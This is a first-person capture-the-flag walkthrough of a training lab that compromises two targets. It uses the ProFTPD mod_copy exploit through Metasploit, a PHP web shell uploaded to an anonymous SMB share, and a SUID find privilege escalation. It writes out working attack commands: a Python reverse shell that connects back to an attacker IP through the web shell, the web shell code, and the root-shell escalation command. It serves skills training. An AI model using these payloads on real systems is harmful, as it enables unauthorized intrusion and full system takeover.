Host & Network Penetration Testing: Exploitation CTF Walkthrough

Introduction

After recently transitioning into my first cybersecurity role, I'm continuing my practical skills development through hands-on labs. This writeup documents my approach to completing the Exploitation CTF, which focuses on vulnerability identification, exploit modification, and privilege escalation techniques.

Challenge Objectives:

• Identify and exploit vulnerable services to achieve initial system compromise
• Leverage both manual exploitation techniques and automated frameworks
• Implement privilege escalation strategies on compromised targets
• Demonstrate post-exploitation enumeration and lateral movement capabilities

---

Flag 1: ProFTPD mod_copy Exploitation

Hint: A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.

Initial Reconnaissance

After confirming target reachability through basic host discovery, I began service enumeration to identify potential attack vectors:

Nmap Service Scan:

nmap -sV target1.ine.local

The scan revealed several services, with ProFTPD standing out as a potentially vulnerable target based on known CVEs affecting this version.

Vulnerability Research

Using searchsploit, I identified multiple exploits for ProFTPD:

searchsploit proftpd 1.3.5

Vulnerability Analysis: CVE-2015-3306

Before executing the attack, I researched the mechanics of CVE-2015-3306 to ensure all necessary environmental prerequisites were met on the target. The core vulnerability stems from ProFTPD's mod_copy module, which fails to check authentication before allowing users to copy files internally using the SITE CPFR and SITE CPTO commands.

Exploitation Requirements:

1. ✓ ProFTPD with mod_copy enabled (unauthenticated copy vulnerability)
2. ✓ Co-hosted web server with script execution capability (Apache + PHP)
3. ✓ Writable web document root accessible to ProFTPD service account
4. ✓ Default Apache document root: /var/www/html

Attack Chain:
FTP File Copy → Web Root Placement → HTTP Trigger → Remote Code Execution

However, to achieve Remote Code Execution, this FTP flaw must be chained with a co-hosted web server capable of executing server-side code. Because FTP servers are designed strictly for file transfer and lack the ability to parse scripts (like PHP, Python, or Bash), the exploit requires moving the payload into the web server's publicly accessible document root. By doing this, we forcefully hand over the execution responsibility to the web application engine.

Research indicated that the target was running Apache, which defaults to a document root of /var/www/html. The exploit also required the ProFTPD service account to possess write privileges to that web directory.

Exploitation via Metasploit

After gaining an understanding of how the exploit worked, I used Metasploit to automate the attack. Using the exploit/unix/ftp/proftpd_modcopy_exec module, I configured the following parameters:

Configuration:

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS target1.ine.local
set LHOST 192.244.150.2
set SITEPATH /var/www/html
run

Key Parameters:

• RHOSTS: target1.ine.local
• LHOST: 192.244.150.2
• SITEPATH: /var/www/html
• Payload: cmd/unix/reverse_netcat (default)

Execution Results:

• ✓ Successfully connected to FTP server (ProFTPD 1.3.5)
• ✓ PHP payload written to /var/www/html/kxVGG.php
• ✓ Reverse shell session established on port 4444
• ✗ Automated cleanup failed (insufficient permissions)

Metasploit's automated cleanup routine failed to delete the deployed payload file due to insufficient permissions on the web directory. This triggered the "Failure executing payload" message and caused the framework to prematurely abort, incorrectly reporting "no session was created" despite the reverse shell connection remaining active and fully functional.

Security Note: The payload file /var/www/html/kxVGG.php requires manual removal to avoid leaving forensic evidence on the target system.

Shell Upgrade: Basic to Interactive TTY

The initial reverse shell lacked interactive features—no tab completion, command history, or proper signal handling (Ctrl+C would terminate the session). To improve operational capability, I upgraded to a full TTY shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

What this does:

• Imports Python's pty (pseudo-terminal) module
• Spawns a Bash process within a PTY environment
• Enables job control, text editors (vim/nano), and terminal-based applications

This one-liner effectively upgrades the rudimentary shell into a fully interactive TTY session, significantly improving usability for post-exploitation enumeration and privilege escalation activities.

Flag Capture

As indicated by the challenge hint, I navigated to the root directory to capture the first flag:

cd /
ls
cat flag1.txt

Flag 1 captured successfully! ✓

---

Flag 2: Internal Service Discovery

Hint: Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.

Internal Service Enumeration

The hint suggests that an internal service running on the target machine may reveal the second flag. With a foothold established, I pivoted to identifying internal services that may not be visible from external scans.

I used the netstat utility to enumerate listening services:

netstat -tuln

Analysis: Port 8888 is bound specifically to 127.0.0.1 (localhost), which explains why the external Nmap scan couldn't detect it—the service is configured to refuse connections from outside the host. The DNS services on port 53 were likely part of Docker's internal networking infrastructure.

Service Interaction

To interact with the service running on port 8888, I attempted to probe it using netcat:

nc 127.0.0.1 8888

A passphrase prompt appeared upon connection. Based on the hint from Flag 1, I used the previously discovered flag as the passphrase.

Flag 2 captured successfully! ✓

---

Flag 3: SMB Share Misconfiguration

Hint: A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?

Target Reconnaissance

As indicated by the challenge hint, I began by enumerating services on the new target:

Nmap Service Scan:

nmap -sV target2.ine.local

Services Identified:

Port	Service	Version	Notes
80	HTTP	Apache httpd	No obvious vulnerabilities
445	SMB	Samba	Requires investigation

SMB Share Enumeration

No obvious vulnerabilities or relevant CVEs were found for the Apache service, necessitating a pivot to the Samba service. I used smbclient to enumerate available shares:

smbclient -L //target2.ine.local -N

Critical Misconfiguration Identified:

• Share: site-uploads
• Access: Anonymous (no authentication required)
• Permissions: Read + Write
• Risk: Arbitrary file upload to web-accessible directory

This configuration allows an attacker to upload malicious scripts that execute server-side when accessed via HTTP, creating a direct path to Remote Code Execution.

Exploitation: Web Shell Upload

Having confirmed anonymous write access to the share, I uploaded a minimal PHP web shell to test remote code execution:

Web Shell (shell.php):

<?php system($_GET['cmd']); ?>

Upload Process:

smbclient //target2.ine.local/site-uploads -N
put shell.php

RCE Verification:

curl "http://target2.ine.local/site-uploads/shell.php?cmd=id"

Output confirmed successful remote code execution as the www-data user.

Reverse Shell Establishment

Having confirmed Remote Code Execution via the web shell, the next objective was to establish a stable reverse shell. I set up a Netcat listener on my attacker machine and executed a Python-based payload through the vulnerable URL parameter:

Netcat Listener:

nc -nlvp 4444

Reverse Shell Payload:

curl "http://target2.ine.local/site-uploads/shell.php?cmd=python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.244.150.2\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;pty.spawn(\"bash\")'"

What this does:

• Creates a TCP socket connection to the attacker's machine
• Duplicates socket file descriptors to stdin, stdout, and stderr
• Spawns an interactive bash shell through a PTY
• Routes all commands and responses through the network socket

This script forced the target server to initiate an outbound connection back to my machine, hijacking the standard input and output streams to spawn an interactive bash terminal, granting full remote control over the system.

Flag Capture

As indicated by the challenge hint, the flag is located in the root directory. Once the listener caught the connection, I navigated to capture the flag:

cd /
cat flag3.txt

Flag 3 captured successfully! ✓

---

Flag 4: SUID Privilege Escalation

Hint: Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

Privilege Escalation Methodology

As indicated by the challenge hint, the goal now is to escalate privileges from the low-privileged www-data user to root access.

Step 1: Sudo Permissions Check

First, I checked if the current user is allowed to run any specific commands as root without a password:

sudo -l

Result: No sudo privileges for www-data

Step 2: SUID Binary Enumeration

This yielded no results, leading to a pivot to SUID binaries—programs that have the "Set-User-ID" bit set, which means they execute with the permissions of the file owner (usually root) no matter who runs them.

Enumeration was conducted using the following command:

find / -perm -4000 -type f 2>/dev/null

Command Breakdown:

• find / - Recursively search from root directory
• -perm -4000 - Find files with SUID bit set (octal 4000)
• -type f - Restrict to regular files only
• 2>/dev/null - Suppress permission-denied errors

This command recursively searches from root (/) for regular files (-type f) with the SUID permission bit set (-perm -4000), which allows executables to run with their owner's privileges rather than the invoking user's privileges. Error output was suppressed (2>/dev/null) to filter permission-denied messages, returning only exploitable SUID binaries.

SUID Find Exploitation

Critical Finding: /usr/bin/find with SUID bit set (owner: root)

The enumeration revealed /usr/bin/find with the SUID bit set and root ownership, creating a critical privilege escalation vulnerability. The SUID permission forces find to execute with root privileges regardless of which user invokes it.

Vulnerability: The find binary executes with root privileges due to the SUID bit, and its -exec flag allows arbitrary command execution. Leveraging the -exec flag—a native feature of find that executes commands on matched files—enables arbitrary command execution in the context of root. This misconfiguration transforms a standard filesystem utility into a direct privilege escalation vector.

Exploit Command:

find . -exec /bin/sh -p \; -quit

Command Breakdown:

• . - Search in the current directory
• -exec /bin/sh -p - Execute shell with preserved privileges (-p flag critical)
• \; - Terminate the -exec statement
• -quit - Stop after first match (prevents recursive shell spawning for every file)

The -p flag is critical for preserving the SUID root privileges rather than dropping to the invoking user's permissions (www-data). The -quit flag immediately terminates find after spawning the first shell, preventing it from recursively executing for every matched file.

Root Access Verification

Following successful execution of the SUID exploit, root access was confirmed:

whoami

Privilege Escalation Confirmation:

• whoami output: root

This confirmed complete privilege escalation from the low-privileged web server user to root. With full administrative control achieved, navigation to the /root directory granted access to restricted files, including the final CTF flag.

Flag Capture

cd /root
cat flag4.txt

Flag 4 captured successfully! ✓

Total system compromise achieved.

Conclusion

This CTF successfully demonstrated the complete attack chain from initial reconnaissance to full system compromise across multiple targets:

Attack Methodology Summary

1. Reconnaissance: Service enumeration via Nmap and protocol-specific tools (FTP, SMB)
2. Initial Access: Exploitation of ProFTPD mod_copy vulnerability and SMB misconfigurations
3. Post-Exploitation: Shell upgrades, internal service discovery, and lateral movement
4. Privilege Escalation: SUID binary abuse to achieve root access on compromised targets

Tools & Resources

Tools Used:

• Nmap - Network reconnaissance and service enumeration
• Metasploit Framework - Exploitation framework
• SearchSploit - Offline exploit database
• Smbclient - SMB/CIFS client for share enumeration
• Netcat - Network utility for reverse shells

Reference Materials:

• GTFOBins - SUID/sudo privilege escalation techniques
• CVE-2015-3306 - ProFTPD mod_copy vulnerability